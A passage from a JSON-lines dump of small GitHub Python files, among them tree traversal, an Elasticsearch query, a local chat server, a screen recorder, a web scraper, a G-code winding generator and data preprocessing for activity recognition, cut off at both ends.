q.get()\n            print(current.value)\n            if current.left_child != None: q.put(current.left_child)\n            if current.right_child != None: q.put(current.right_child)\n\n# Construct a binary tree\nroot = Node(5)\nroot.left_child = Node(3)\nroot.left_child.left_child = Node(2)\nroot.left_child.right_child = Node(4)\nroot.right_child = Node(10)\nroot.right_child.left_child = Node(6)\nroot.right_child.right_child = Node(11)\n\nlevel_order(root)\n","repo_name":"ImAtestForMeng/algorithms","sub_path":"tree/bst_level_order.py","file_name":"bst_level_order.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44612624325","text":"n = int(input('Enter the number of minutes\\n'))\ndef time(n):\n    hours = n // 60\n    while hours >= 24:\n        hours = hours % 24\n    minutes = n % 60\n    time = hours, minutes\n    return time\n\nprint(time(n))","repo_name":"Rauntfett/Chekanov-AM","sub_path":"задание 3/3.3/3.3.py","file_name":"3.3.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17614296844","text":"from util import get_client, INDEX_NAME\n\nclient = get_client()\n\nresp = client.search(index=INDEX_NAME, query={'match_all': {}})\n\nprint(f'Got {resp[\"hits\"][\"total\"][\"value\"]} Hits:')\nfor hit in resp['hits']['hits']:\n    doc = hit['_source']\n    score = hit['_score']\n    # print('Headline:', doc['headline'], 'Description\\n\\t', doc['short_description'])\n    print(hit)\n","repo_name":"tomas-koristka/elastic-search-playground","sub_path":"query/query_all.py","file_name":"query_all.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33445323269","text":"#Author -- Stephen Rosen\n\nfrom __future__ import print_function\nimport lxml.etree as etree\nimport string, re\n\n#cleans up the xpath expression for use in our xml, respecting xpath syntax\ndef clean_xpath(exp):\n    def clean_single_exp(exp):\n        #prepend a '_' to each section, and clean it up for our xml\n        parts = re.split(r'(?<!\\\\)/', exp)\n        for i, part in enumerate(parts):\n            if part == '' or (len(part) >= 6 and part[0:6] == 'node()'):\n                continue\n            else:\n                parts[i] = make_name_conform(part.strip())\n        return \"/\".join(parts)\n    #split into multiple xpath expressions on OR, conform, then merge\n    expressions = exp.split('|')\n    return ' | '.join([clean_single_exp(x.strip()) for x in expressions])\n\n\ndef make_name_conform(exp):\n    #can't use a regex for this because bracket nesting is recursive\n    exp=list(exp) #convert to list of chars\n    #We used to think we could just explicitly check a set of bad characters, oh, how naive we were...\n    goodchars=string.letters+string.digits\n    brackets = 0\n    #replace bad chars with underscores, unless they are in brackets\n    for i in xrange(len(exp)):\n        cur = exp[i]\n        if cur == '[': brackets+=1\n        elif cur == ']':\n            brackets-=1\n            if brackets < 0: brackets = 0\n        elif brackets == 0:\n            if cur not in goodchars:\n                exp[i]='_'+str(ord(cur))+'_'\n                if cur == '\\\\': exp[i] =''\n            elif cur == '/':\n                if (i > 0) and exp[i-1] == '\\\\':\n                    exp[i]='_'\n                    exp[i-1]=''\n    exp=''.join(exp) #convert back into a string\n    return '_'+exp\n\n#sadly, the attributes are not always safe in xml\ndef clean_attribute(attribute):\n    attribute=list(attribute)\n    for i in xrange(len(attribute)):\n        if attribute[i] in '&<\"' or attribute[i] not in string.printable:\n            attribute[i] = '_'+str(ord(attribute[i]))+'_'\n    return 
''.join(attribute)\n","repo_name":"sirosen/inv_parser","sub_path":"xml_cleanup.py","file_name":"xml_cleanup.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41227353474","text":"import threading\nimport socket\n\nhost = \"127.0.0.1\"\nport = 49999\n\n# TCP\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind((host, port))\nserver.listen()\n\nclients = []\nnicknames = []\n\n\ndef broadcast(message):\n    for client in clients:\n        client.send(message.encode(\"ascii\"))\n\n\n# for each client, run handle(client) function\ndef handle(client):\n    while True:\n        try:\n            # Receive message from a client and then broadcast the message\n            # to all clients\n            message = client.recv(1024).decode(\"ascii\")\n            broadcast(message)\n        except:\n            index = clients.index(client)\n            clients.remove(client)\n            client.close()\n            nickname = nicknames[index]\n            broadcast(f\"{nickname} left the chat!\")\n            nicknames.remove(nickname)\n            break\n\n\ndef receive():\n    while True:\n        # Wait for an incoming connection.\n        # Return a new socket representing the connection,\n        # and the address of the client.\n        client, address = server.accept()\n        print(f\"Connected with {str(address)}\")\n\n        client.send(\"NICK\".encode(\"ascii\"))\n        nickname = client.recv(1024).decode(\"ascii\")\n\n        nicknames.append(nickname)\n        clients.append(client)\n\n        print(f\"Nickname of the client is {nickname}\")\n        broadcast(f\"{nickname} joined the chat\")\n        print(\"Current users in the chat room: \", nicknames)\n        client.send(\"Connected to the server!\".encode(\"ascii\"))\n\n        thread = threading.Thread(target=handle, args=(client,))\n        thread.start()\n\n\nprint(f\"Server is listening on port {port}\")\nreceive()\n","repo_name":"weilyuwang/python-network-programming","sub_path":"tcp_chat_room/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16950915949","text":"import pygame\r\nfrom pygame.sprite import Sprite\r\n\r\n\r\nclass StarInfo(Sprite):\r\n    \"\"\"A class to represent a star.\"\"\"\r\n\r\n    def __init__(self, star):\r\n        \"\"\"Initialize the star and set its starting position.\"\"\"\r\n        super().__init__()\r\n        self.screen = star.screen\r\n\r\n        self.image = pygame.image.load('images/Capture.bmp')\r\n        self.rect = self.image.get_rect()\r\n\r\n        self.rect.x = self.rect.width\r\n        self.rect.y = self.rect.height\r\n\r\n        self.x = float(self.rect.x)\r\n\r\n\r\n\r\n","repo_name":"noshah/Python_Practice","sub_path":"chapter13_practice/star_info.py","file_name":"star_info.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33368814468","text":"import cv2\nimport numpy as np\nimport pyautogui\nimport keyboard\n\n# Get the size of the screen using pyautogui\nscreen_size = tuple(pyautogui.size())\n\n# Define the format and create video writer object\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\nout = cv2.VideoWriter('output.avi', fourcc, 20.0, (screen_size))\n\nwhile True:\n    # Capture Screen\n    img = pyautogui.screenshot()\n\n    #Convert image into numpy array\n    img = np.array(img)\n\n    img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n    out.write(img)\n\n    # To Exit press q to terminate\n    if(keyboard.is_pressed('q')):\n        print(\"Recording Stopped\")\n        
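# leave the capture loop; the VideoWriter is released below to finalize output.avi\n        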
break\n\nout.release()\ncv2.destroyAllWindows()\n","repo_name":"pmihsan/Python-GUI-Programs","sub_path":"Applications/ScreenRecorder/screenRecorder.py","file_name":"screenRecorder.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1229504067","text":"#coding:utf-8\nfrom urllib import request\nimport re\nfrom bs4 import BeautifulSoup\n\nurl = 'http://www.okooo.com/soccer/team/6/players/'\nhds = { \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\", \n    \"Accept-Language\": \"zh-CN,zh;q=0.8\", \n    \"Cache-Control\": \"no-cache\", \n    \"Connection\": \"keep-alive\", \n    \"Host\": \"www.okooo.com\", \n    \"Upgrade-Insecure-Requests\": \"1\", \n    \"Pragma\": \"no-cache\",\n    \"Upgrade-Insecure-Requests\": \"1\",\n    \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36\"}\n\nreqhd = request.Request(url, headers = hds)\nreq = request.urlopen(reqhd)\ncon = req.read().decode('gbk')\n# grab the players table markup from the page source\nrs = re.findall(r'<table.*?</table>', con, re.S)\nsoup = BeautifulSoup(rs[0], 'html5lib')\ndata_list = [] # structure: [dict1, dict2, ...]; one dict per player row; keys mean: number, player, position, appearances, starts, substitute appearances, minutes played, goals, assists, yellow cards, red cards\nfor idx, tr in enumerate(soup.find_all('tr')):\n    if idx != 0:\n        tds = tr.find_all('td')\n        data_list.append({\n            '号码': tds[0].contents[0],\n            '球员': tds[1].a.contents[0],\n            '位置': tds[2].contents[0],\n            '出场': tds[3].contents[0],\n            '首发': tds[4].contents[0],\n            '替补': tds[5].contents[0],\n            '出场时间': tds[6].contents[0],\n            '进球': tds[7].contents[0],\n            '助攻': tds[8].contents[0],\n            '黄牌': tds[9].contents[0],\n            '红牌': tds[10].contents[0],\n        })\nprint(data_list)","repo_name":"lidongheng/FootballmatchAnalysing","sub_path":"before/okooo.py","file_name":"okooo.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44049236015","text":"import math \n\nfile = open(\"test.gcode\",\"w\") \n \nfile.write(\"G92 X0 Y0 Z0 E0\\n\")\nfile.write(\"G90\\n\") \nfile.write(\"M85 600\\n\") \n\n\n\ncartesianCode = 0\nnumStatorPoles = 12\nRotFeed = 1\n\nextrudeFake = 0\n\ndef toXYZ(x,z,angle):\n    if cartesianCode:\n        global extrudeFake\n        extrudeFake=extrudeFake+1\n        file.write(\"G1 \") \n        if x!=None and angle!=None:\n            file.write(\" X{}\".format(x*math.cos(math.radians(angle))))\n        if angle!=None:\n            yy = x*math.sin(math.radians(angle))\n            file.write(\" Y{}\".format(yy))\n        if z!=None:\n            file.write(\" Z{}\".format(z))\n        if angle!=None:\n            file.write(\" E{}.{}\".format(extrudeFake,int(angle*100)))\n        file.write(\"\\n\")\n    else:\n        file.write(\"G1 \") \n        if x!=None:\n            file.write(\" X{}\".format(x))\n        file.write(\" Y{}\".format(0))\n        if z!=None:\n            file.write(\" Z{}\".format(z))\n        if angle!=None:\n            file.write(\" E{}\".format(angle/360.0))\n        file.write(\"\\n\")\n\n\n#toXYZ(0,0,0);\n\n\nz = 0\nzUpDelta = 16\nxLen = 9\nxStart = 0 if cartesianCode==0 else 10\nxIncr = 0.35\nxRotCompensation = 0.2\n\nfile.write(\"G1 F500\\n\") \n\nwiringType = 0\n\nif wiringType==0:\n    # total \n    numTurnsValue = 23\n    numTurnsPerLayer = [ \n    {\"numTurns\":numTurnsValue, \"xStart\":xStart, \"xIncr\":xIncr, \"xRotCompensation\":xRotCompensation },\n    {\"numTurns\":numTurnsValue, \"xStart\":xStart+numTurnsValue*xIncr, \"xIncr\":-xIncr,\"xRotCompensation\":-xRotCompensation },\n    {\"numTurns\":numTurnsValue, \"xStart\":xStart, \"xIncr\":xIncr,\"xRotCompensation\":xRotCompensation },\n    {\"numTurns\":4, 
\"xStart\":xStart+numTurnsValue*xIncr-2*xIncr, \"xIncr\":-xIncr*2,\"xRotCompensation\":-xRotCompensation },\n {\"numTurns\":4, \"xStart\":xStart+numTurnsValue*xIncr-4*2*xIncr, \"xIncr\":xIncr*2,\"xRotCompensation\":xRotCompensation },\n {\"numTurns\":numTurnsValue-10, \"xStart\":xStart+numTurnsValue*xIncr, \"xIncr\":-xIncr,\"xRotCompensation\":-xRotCompensation },\n #{\"numTurns\":numTurnsValue, \"xStart\":xStartr, \"xIncr\":xIncr },\n #{\"numTurns\":numTurnsValue/2, \"xStart\":xStart+numTurnsValue*xIncr, \"xIncr\":-xIncr },\n ]\nelse:\n # test\n numTurnsPerLayer = [ \n {\"numTurns\":2, \"xStart\":xStart, \"xIncr\":3,\"xRotCompensation\":xRotCompensation },\n {\"numTurns\":2, \"xStart\":xStart+5, \"xIncr\":-3,\"xRotCompensation\":xRotCompensation },\n ]\n\ncount = 0\nfor turns in numTurnsPerLayer:\n numTurns = turns[\"numTurns\"]\n count+=numTurns\n\nprint(\"NumTurns: \",count)\n\n\ndef CW(pole):\n file.write(\";CW\\n\") \n curAngle = 360/numStatorPoles*pole\n nextAngle = 360/numStatorPoles*(pole+1)\n for turns in numTurnsPerLayer:\n numTurns = turns[\"numTurns\"]\n xCurStart = turns[\"xStart\"]\n xCurIncr = turns[\"xIncr\"]\n xCurRotComp = turns[\"xRotCompensation\"]\n for turn in range(numTurns):\n toXYZ(xCurStart+xCurIncr*turn,z,curAngle)\n toXYZ(xCurStart+xCurIncr*turn,z+zUpDelta,curAngle)\n toXYZ(xCurStart+xCurIncr*turn+xCurRotComp,z+zUpDelta,nextAngle)\n if turn==numTurns-1:\n toXYZ(xCurStart+xCurIncr*(turn)+xCurRotComp,z,nextAngle)\n else:\n toXYZ(xCurStart+xCurIncr*(turn)+xCurRotComp,z,nextAngle)\n\n# toXYZ(xStart,z,curAngle)\n# toXYZ(xStart,z+zUpDelta,curAngle)\n# toXYZ(xStart,z+zUpDelta,nextAngle)\n\ndef CCW(pole):\n file.write(\";CCW\\n\") \n curAngle = 360/numStatorPoles*pole\n nextAngle = 360/numStatorPoles*(pole+1)\n for turns in numTurnsPerLayer:\n numTurns = turns[\"numTurns\"]\n xCurStart = turns[\"xStart\"]\n xCurIncr = turns[\"xIncr\"]\n xCurRotComp = turns[\"xRotCompensation\"]\n for turn in range(numTurns):\n toXYZ(xCurStart+xCurIncr*turn,z,nextAngle)\n toXYZ(xCurStart+xCurIncr*turn,z+zUpDelta,nextAngle)\n toXYZ(xCurStart+xCurIncr*turn+xCurRotComp,z+zUpDelta,curAngle)\n if turn==numTurns-1:\n toXYZ(xCurStart+xCurIncr*(turn)+xCurRotComp,z,curAngle)\n else:\n toXYZ(xCurStart+xCurIncr*(turn)+xCurRotComp,z,curAngle)\n\n\n# note poles index here starts from 1\nwiringDiagramm = [\n# {\"Order\":\"CW\",\"Pole\":1},\n {\"Order\":\"CCW\",\"Pole\":1},\n {\"Order\":\"CW\",\"Pole\":2},\n {\"Order\":\"CCW\",\"Pole\":3},\n {\"Order\":\"NONE\",\"Pole\":9},\n {\"Order\":\"CCW\",\"Pole\":9},\n {\"Order\":\"CW\",\"Pole\":8},\n {\"Order\":\"CCW\",\"Pole\":7},\n ]\n\nfor pole in wiringDiagramm:\n file.write((\";LAYER:{}\\n\") .format(pole))\n poleIndex = pole[\"Pole\"]-1\n order = pole[\"Order\"]\n if order==\"CW\":\n CW(poleIndex)\n elif order==\"CCW\":\n CCW(poleIndex)\n else:\n curAngle = 360/numStatorPoles*poleIndex\n toXYZ(9,z,None)\n toXYZ(9,z,curAngle)\n toXYZ(0,z,curAngle)\n\ntoXYZ(0,z,None)\n\nfile.close() #to change file access modes ","repo_name":"pavlog/RobotUtils","sub_path":"bldc_wiring.py","file_name":"bldc_wiring.py","file_ext":"py","file_size_in_byte":4458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"10274588629","text":"class Matchconfig:\n\n def __init__(self, moledie_range: int, bowlerblade_range: int, bowlerblade_hit_chance: float,\n bowlerblade_damage: int, lasercompact_hit_chance: float, rocketpen_damage: int, gasgloss_damage: int,\n mothballpouch_range: int, mothballpouch_damage: int, fogtin_range: 
int, grapple_range: int,\n                 grapple_hit_chance: float,\n                 wiretapWithEarplugs_fail_chance: float, mirror_swap_chance: float, cocktail_dodge_chance: float,\n                 cocktail_hp: int,\n                 spy_success_chance: float, babysitter_success_chance: float, honeytrap_success_chance: float,\n                 observation_success_chance: float,\n                 chips_to_ip_factor: int, secret_to_ip_factor: int, min_chips_roulette: int, max_chips_roulette: int,\n                 round_limit: int, turn_phase_limit: int,\n                 cat_ip: int, strike_max: int, pause_limit: int, reconnect_limit: int):\n        self.moledie_range = moledie_range\n        self.bowlerblade_range = bowlerblade_range\n        self.bowlerblade_hit_chance = bowlerblade_hit_chance\n        self.bowlerblade_damage = bowlerblade_damage\n        self.lasercompact_hit_chance = lasercompact_hit_chance\n        self.rocketpen_damage = rocketpen_damage\n        self.gasgloss_damage = gasgloss_damage\n        self.mothballpouch_range = mothballpouch_range\n        self.mothballpouch_damage = mothballpouch_damage\n        self.fogtin_range = fogtin_range\n        self.grapple_range = grapple_range\n        self.grapple_hit_chance = grapple_hit_chance\n        self.wiretapWithEarplugs_fail_chance = wiretapWithEarplugs_fail_chance\n        self.mirror_swap_chance = mirror_swap_chance\n        self.cocktail_dodge_chance = cocktail_dodge_chance\n        self.cocktail_hp = cocktail_hp\n        self.spy_success_chance = spy_success_chance\n        self.babysitter_success_chance = babysitter_success_chance\n        self.honeytrap_success_chance = honeytrap_success_chance\n        self.observation_success_chance = observation_success_chance\n        self.chips_to_ip_factor = chips_to_ip_factor\n        self.secret_to_ip_factor = secret_to_ip_factor\n        self.min_chips_roulette = min_chips_roulette\n        self.max_chips_roulette = max_chips_roulette\n        self.round_limit = round_limit\n        self.turn_phase_limit = turn_phase_limit\n        self.cat_ip = cat_ip\n        self.strike_max = strike_max\n        self.pause_limit = pause_limit\n        self.reconnect_limit = reconnect_limit\n","repo_name":"masirt/uulm-softwareproject","sub_path":"dummy-ai-client/NetworkStandard/DataTypes/Matchconfig/matchconfig.py","file_name":"matchconfig.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1757230962","text":"import pandas as pd\nfrom sklearn.preprocessing import LabelEncoder, StandardScaler\nimport numpy as np\nimport scipy.stats as stats\n\n\ndef load(Filepath=None, Name='N/A', Activity='N/A'):\n    if Filepath is not None:\n\n        data = pd.read_csv(str(Filepath), sep =\"\\s+\", header=None)\n        data.columns = ['time_stamp', 'left_fsr_reading_mv', 'right_fsr_reading_mv', 'hip_distance',\n                'left_vibration_trigger', 'right_vibration_trigger', 'hip_vibration_trigger']\n        data['Name'] = str(Name)\n        data['Activity'] = str(Activity)\n        data['left_fsr_reading_mv'] = pd.to_numeric(data['left_fsr_reading_mv'], downcast=\"float\")\n        data['right_fsr_reading_mv'] = pd.to_numeric(data['right_fsr_reading_mv'], downcast=\"float\")\n        data['hip_distance'] = pd.to_numeric(data['hip_distance'], downcast=\"float\")\n    else:\n        data = pd.DataFrame(columns=['time_stamp', 'left_fsr_reading_mv', 'right_fsr_reading_mv', 'hip_distance',\n                'left_vibration_trigger', 'right_vibration_trigger', 'hip_vibration_trigger', 'Name', 'Activity'])\n        # Trick to make name and activity values NaN\n        data['Name'] = pd.to_numeric(data['Name'], errors='coerce')\n        data['Activity'] = pd.to_numeric(data['Activity'], errors='coerce')\n        data['left_fsr_reading_mv'] = pd.to_numeric(data['left_fsr_reading_mv'], downcast=\"float\")\n        data['right_fsr_reading_mv'] = 
pd.to_numeric(data['right_fsr_reading_mv'], downcast=\"float\")\n        data['hip_distance'] = pd.to_numeric(data['hip_distance'], downcast=\"float\")\n    return data\n\ndef combine_and_index(data_stand, data_sit, data_walk):\n    data = data_stand.append(data_sit)\n    data = data.append(data_walk)\n    data.set_index(\n        ['time_stamp', 'left_fsr_reading_mv', 'right_fsr_reading_mv', 'hip_distance', 'left_vibration_trigger', 'right_vibration_trigger', 'hip_vibration_trigger', 'Name', 'Activity'])\n    data.dropna(axis=0)\n    data = data[(data.left_fsr_reading_mv != 0) & (data.right_fsr_reading_mv != 0) & (data.hip_distance != 0)]\n    print(\"Initial data clean result: \", data.head())\n    return data\n\ndef new_train_data_merge(train_cleaned_data):\n    with open('/Users/stankusnt/Desktop/Work/StrideTech AI Test/Model_training/initial_data_cleaned.csv', 'a') as f:\n        (train_cleaned_data).to_csv(f, header=False, index=False)\n\ndef balance_data(data):\n    walking_data_length = len(data[data['Activity'] == 'Walking'])\n    sitting_data_length = len(data[data['Activity'] == 'Sitting'])\n    standing_data_length = len(data[data['Activity'] == 'Standing'])\n\n    truncate_count = min(walking_data_length, sitting_data_length, standing_data_length)\n\n    #shrink data so same # of rows\n\n    walking = data[data['Activity'] == 'Walking'].head(truncate_count)\n    sitting = data[data['Activity'] == 'Sitting'].head(truncate_count)\n    standing = data[data['Activity'] == 'Standing'].head(truncate_count)\n\n    balanced_data = pd.concat([walking, sitting, standing])\n\n    balanced_data = balanced_data.drop(['time_stamp', 'left_vibration_trigger', 'right_vibration_trigger', 'hip_vibration_trigger', 'Name'], axis = 1)\n\n    # Set labels\n    label = LabelEncoder()\n    balanced_data['label'] = label.fit_transform(balanced_data['Activity'])\n    print(\"Balanced data result: \", balanced_data.describe())\n    return balanced_data, label\n\ndef standardize_data(balanced_data):\n    X = balanced_data[['left_fsr_reading_mv', 'right_fsr_reading_mv', 'hip_distance']] # input variables\n    Y = balanced_data[['label']] # output\n    scaler = StandardScaler()\n    X = scaler.fit_transform(X)\n\n    scaled_X = pd.DataFrame(data=X, columns=['left_fsr_reading_mv', 'right_fsr_reading_mv', 'hip_distance'])\n    scaled_X['label'] = Y.values\n    print(\"Scaled X description: \" + str(scaled_X.describe()))\n    return scaled_X, Y\n\ndef get_frames(data, Fs=1, frame_size=None, hop_size=None, N_FEATURES=3):\n    if frame_size is None:\n        frame_size=Fs*2\n    if hop_size is None:\n        hop_size=Fs*1\n    frames = []\n    labels = []\n    for i in range(0, len(data) - frame_size, hop_size):\n        left_fsr_reading_mv = data['left_fsr_reading_mv'].values[i: i + frame_size]\n        right_fsr_reading_mv = data['right_fsr_reading_mv'].values[i: i + frame_size]\n        hip_distance = data['hip_distance'].values[i: i + frame_size]\n\n        # Retrieve the most frequently used label in this segment\n        label = stats.mode(data['label'][i: i + frame_size])[0][\n            0] # array within an array returned, and only 1, but still have to reference the index\n        frames.append([left_fsr_reading_mv, right_fsr_reading_mv, hip_distance])\n        labels.append(label)\n\n    # Bring segments into new and improved shape\n    frames = np.asarray(frames).reshape(-1, frame_size, N_FEATURES) # reformat into vector\n    labels = np.asarray(labels)\n    print(\"Frames sample: \" + str(frames[:2,:2]))\n    print(\"Labels sample: \" + str(labels[:2]))\n    return frames, labels\n\ndef reshape(X):\n    X_dim1, X_dim2, X_dim3 = X.shape\n\n    # Make 3D Model\n    X = X.reshape(X_dim1, X_dim2, X_dim3, 1)\n    print(\"Input shape is: \", X[5].shape)\n    
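# each (frame_size, 3) window gains a trailing channel axis, i.e. the batch\n    # becomes (samples, frame_size, 3, 1), the channels-last layout that\n    # Conv2D-style layers expect.\n    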
return X\n\n","repo_name":"stankusnt97/StrideTech-AI-Deploy","sub_path":"Functions/_data_preprocessing.py","file_name":"_data_preprocessing.py","file_ext":"py","file_size_in_byte":5139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4159339088","text":"number = int(input())\r\npower = 1\r\ntemp = number ** power #the number that is saved if it is right, start from 2\r\nfinished = False\r\n\r\nwhile(not finished): #not finished = True to run\r\n for i in [1,2,3,4,5,6,7,8,9,0]:\r\n if str(i) in str(temp) and count == 9:\r\n finished = True\r\n print(power)\r\n\r\n elif str(i) in str(temp) and count != 9:\r\n count += 1\r\n \r\n elif str(i) not in str(temp):\r\n power += 1\r\n temp = number**power\r\n print(temp)\r\n count = 0 \r\n continue\r\n\r\n","repo_name":"alwinchoi/Math-problem-","sub_path":"part a of the problem.py","file_name":"part a of the problem.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26028979998","text":"#! /usr/bin/python3\n\nimport cgi\n\nimport cgitb\ncgitb.enable()\n\nimport kelly6\nimport yate\nimport glob\n\ndata_files = glob.glob(\"data/*.txt\")\nathletes = kelly6.loadfiles(data_files)\n\nform_data = cgi.FieldStorage()\nathlete_name = form_data['which_athlete'].value\n\nathlete = None\n\nfor each_athlete in athletes:\n\tif each_athlete.name == athlete_name:\n\t\tathlete = each_athlete\n\telse:\n\t\tpass\n\nprint(yate.start_response())\nprint(yate.include_header(\"Coach Kelly's Timing Data\")) \nprint(yate.header(\"Athlete: \" + athlete_name + \", DOB: \" +\n athlete.birthdate + \".\"))\nprint(yate.para(\"The top times for this athlete are:\"))\nprint(yate.u_list(athlete.top3()))\nprint(yate.include_footer({\"Home\": \"/index.html\",\n \"Select another athlete\": \"generate_list.py\"}))\n\n","repo_name":"hehahovip/firstpython","sub_path":"chapter8/webapp/cgi-bin/generate_timing_data.py","file_name":"generate_timing_data.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42331512485","text":"\"\"\"\nAdvent of Code 2019 - Day 1\n\nThis program will read in data from a .dat file, run the desired calculation \nand sum the results\n\nThen the exrta fuel mass will be added to them results, and the process\nwill be rpeated\n\nAuthor: Tom Kite\n\"\"\"\n\nimport numpy as np\n\ndef calc_101(x):\n output = np.floor(x/3) - 2\n return output\n\ndef new_fuel_mass(current_masses):\n return sum(calc_101(current_masses))\n\ndef main_loop():\n \n # Main variables \n file_name = \"101.dat\"\n raw_data = np.array([])\n \n # Check file open\n try:\n input_file = open(file_name,'r')\n except:\n print(\"File couldn't be opened!\")\n return\n \n # Read in raw data, casting to float\n for line in input_file:\n raw_data = np.append( raw_data, float(line) )\n \n # Close input file \n input_file.close()\n \n total_fuel_per_module = np.array([])\n \n for module_mass in raw_data:\n \n fuel_masses = np.array( [calc_101(module_mass)] )\n \n while ( calc_101(fuel_masses[-1]) > 0):\n fuel_masses = np.append( fuel_masses, calc_101(fuel_masses[-1]) )\n \n total_fuel_per_module = np.append( total_fuel_per_module, sum(fuel_masses) )\n \n print( sum(total_fuel_per_module) )\n 
\nmain_loop()","repo_name":"TomKite57/advent_of_code_2019","sub_path":"102.py","file_name":"102.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"34932169749","text":"#!/usr/bin/python3\n\n\"\"\"\nImport Required Libraries\n\"\"\"\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\n\n\"\"\"\nInitialize Variables.\n\"\"\"\nletterA = []\nletterC = []\nfilename = \"histogram.txt\"\n\n\"\"\"\nOpen Histogram File And Build\nLists Used To Graph.\n\"\"\"\nwith open(filename,'r') as f:\n for line in f:\n a = line.split(':')\n letterA.append(a[0])\n letterC.append(int(a[1]))\n\n\"\"\"\nPlot Histogram & Save Plot To File.\nFile Is Date And Time Stamped.\n\"\"\"\nfigname = \"saved_figs/cryptograph_{0}.jpg\".format(datetime.now().strftime(\"%Y%m%d_%H%M%S\"))\nfig = plt.figure()\nplt.bar(letterA,letterC)\nplt.xlabel(\"Letters\")\nplt.ylabel(\"Count\")\ntry:\n plt.savefig(figname)\n print(\"[+] Histogram Saved To {0}\".format(figname))\nexcept:\n print(\"[!] Unable To Save Figure\")\nplt.show()\n\n","repo_name":"thomas-osgood/CypherCrack","sub_path":"graphHist.py","file_name":"graphHist.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17280443634","text":"\"\"\"\nQuestion:\nGiven the root of a binary tree, return the maximum width of the given tree.\n\nThe maximum width of a tree is the maximum width among all levels.\n\nThe width of one level is defined as the length between the end-nodes (the leftmost and rightmost non-null nodes), where the null nodes between the end-nodes that would be present in a complete binary tree extending down to that level are also counted into the length calculation.\n\nIt is guaranteed that the answer will in the range of a 32-bit signed integer.\n\nSoln:\nbfs search adn get max width for each layer\n\"\"\"\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution(object):\n def widthOfBinaryTree(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n from collections import deque\n queue = deque([[root, 1]])\n ans = 0\n while queue:\n left = right = None\n for _ in range(len(queue)):\n node, idx = queue.popleft()\n if not left:\n left = idx\n if left:\n right = idx\n if node.left:\n queue.append((node.left, idx*2-1))\n if node.right:\n queue.append((node.right, idx*2))\n ans = max(ans, right - left+1)\n return ans\n","repo_name":"GaaryApple/MyLeetcode","sub_path":"662_Maximum_Width_of_Binary_Tree/662_Maximum_Width_of_Binary_Tree.py","file_name":"662_Maximum_Width_of_Binary_Tree.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"593822099","text":"# Enter your code here. Read input from STDIN. 
Print output to STDOUT\n\ntest = int(input())\n\nfor _ in range(test):\n    input()\n    lst = list(map(int, input().split()))\n    l = len(lst)\n    i = 0\n    while i < l-1 and lst[i] >= lst[i+1]:\n        i = i + 1\n    while i < l-1 and lst[i] <= lst[i+1]:\n        i = i + 1\n    if i == l-1:\n        print(\"Yes\")\n    else:\n        print(\"No\")","repo_name":"Vivekagent47/HackerRank","sub_path":"Python/63.py","file_name":"63.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18169187355","text":"import re\n\n## Django imports\nfrom django import forms\nfrom django.forms import ModelForm\nfrom django.db.models import Count\nfrom django.forms.models import ModelChoiceField\n\n## MAGE imports\nfrom scm.models import Delivery, LogicalComponentVersion, InstallableItem, ItemDependency, InstallationMethod\nfrom ref.models import LogicalComponent\nfrom ref.widgets import ClearableFileInputPretty\n\nclass DeliveryForm(ModelForm):\n    def clean_ticket_list(self):\n        data = self.cleaned_data['ticket_list']\n        if not data:\n            return data\n        p = re.compile('([\\da-zA-Z_-]+,?)+$')\n        if p.match(data) is None:\n            raise forms.ValidationError(\"This field must be a comma-separated list of ticket IDs (letters and digits)\")\n        return data\n\n    class Meta:\n        model = Delivery\n        exclude = 